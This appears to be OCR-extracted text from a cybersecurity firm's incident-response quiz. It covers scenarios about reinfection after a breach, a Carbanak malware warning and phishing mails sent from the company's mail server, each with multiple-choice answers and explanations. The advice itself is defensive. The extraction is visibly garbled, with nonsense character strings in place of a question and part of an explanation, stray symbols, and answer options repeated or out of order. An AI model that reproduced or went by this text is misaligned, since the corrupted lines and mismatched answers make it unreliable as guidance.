your company: the adversary had full access to the 
entire infrastructure for two weeks. The incident was 
contained and eradicated. Now, antivirus software 
detects suspicious executable files used by the same 
cybercriminal group on servers in the internal network. 


WAV aYo Ons) aTelU I omVelU melon lamaalls 
case? 
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The best option is to disconnect the company's infrastructure from the 
Internet. It is likely that the company’s entire network has already been 
compromised. Malware detected on servers is one of the most perceivable 
signs of attackers activity. 


At this point isolating only those servers where malware was detected will 
be inefficient. 


If you face a similar situation, block the attackers’ access to the network first 
and then proceed to a step-by-step analysis of their activity. 
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What should you do? 5 
1. Check the systems with an antivirus once again to ensure that the malware 
was deleted 
2. Clarify the list of infected systems and isolate them from the network ¥ x 
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3. Submit the discovered malware samples to experts from the cybersecurity : 7 
company , 
4. Disconnect the company’s network from the Internet 
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You are contacted by experts from a well-known 
cybersecurity firm. They inform you that a dangerous 
malware used by the Carbanak group has been 
detected in your network. However, your employees 
have already scanned the suspicious systems with 

an antivirus and deleted all detected files. 


What should you do? 


2. Clarify the list of infected systems and isolate them from the network 
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The right option is to ask the company’s representatives to provide you 

with a list of the infected systems. You should isolate those systems from 
the network and then conduct a detailed analysis of them considering the 
information about techniques, tactics and procedures (TTP) of the attackers. 


In Our experience, companies often ignore such reports from cybersecurity 
specialists thinking that an antivirus check is enough. Due to the lack of 
response procedures, adversaries achieve their goals, while companies suffer 
financial losses. 
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They contain a link to a fake Outlook Web Access 
page. Analysis of the email headers confirms that 
the messages are sent from your mail server. 


What should you do? 


1. Image the data storage and RAM of the mail server 
Perform amass check of all network systems for unauthorised access 


Check the employee's email account for the same phishing messages 


a 


Perform an antivirus scan of the employee's PC 
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They contain a link to a fake Outlook Web Access 
page. Analysis of the email headers confirms that the 
messages are sent from your mail server. 


What should you do? 


3. Check the employee's email account for the same phishing messages 
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First of all, you should check the inbox of the user from who had sent 
the phshing messages to find out if there are similar messages. 


In such situations, we usually suspect that there is malware on the user's 
PC or that cybercriminals have infiltrated the company’s network. However, 
these things are usually much simpler. Typically, the situation unfolds as 
follows: an employee receives a phishing email, follows the link to a fake 
page mimicking a mail service interface (e.g. Outlook Web Access or Gmail) 
and enters their login and password. If the mail service is accessible via 

the Internet, this data will be enough for the attackers to gain access to 

idatomvs (ell aakou=1 ale] m-(ereel0]alar-]alemcir- iam aalcl|lialemelelmaale)tome)alicjallale mm malise-\Zellels 
the need for any PC's being infected with malware. 


Our practice shows that heads of cybersecurity departments are prone to 
over-react to such incidents. Some companies, for example, initiated a large- 
scale scan of all systems at once, which wasted a lot of resources and time. 
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1. Delete the home directory of the user from the system 
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Scan the system with an antivirus 
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Isolate the user’s PC from the rest of the network 
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1. Delete the home directory of the user from the system 


Cybersecurity 
figures 


Send the malicious attachment for analysis 
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Scan the system with an antivirus 
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Isolate the user’s PC from the rest of the network 
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Strategic partner of the INTERPOLs Cybercrime Programme. = c 
Oo 
Expert member of the World Economic Forum Centre for Cybersecurity. a e 
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Certified member of the Council for Registered Ethical Security Testers > 
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Cybersecurity services provider recommended by SWIFT 7 
in 79 countries. 
BI.ZONE-CERT is a full member of the FIRST association of computer 
security incident response teams. 
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